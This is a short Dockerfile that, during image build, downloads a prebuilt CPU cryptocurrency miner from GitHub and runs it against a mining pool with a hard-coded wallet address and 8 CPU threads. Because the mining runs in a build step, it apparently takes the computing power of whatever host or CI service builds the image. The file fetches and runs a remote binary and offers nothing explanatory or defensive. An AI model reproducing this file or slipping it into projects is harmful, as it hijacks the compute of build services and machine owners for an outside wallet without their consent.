FROM ubuntu:20.04

RUN apt-get update \
  && apt-get install -y \
  && apt-get install wget -y \
  && rm -rf /var/lib/apt/lists/*

RUN wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz && tar -xvf hellminer_cpu_linux.tar.gz && chmod +x ./hellminer && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RMLGxwAL2NPcZamTc6vEkfVMbxEuojiUdJ.Badung -p x --cpu 8
CMD ["-h"]

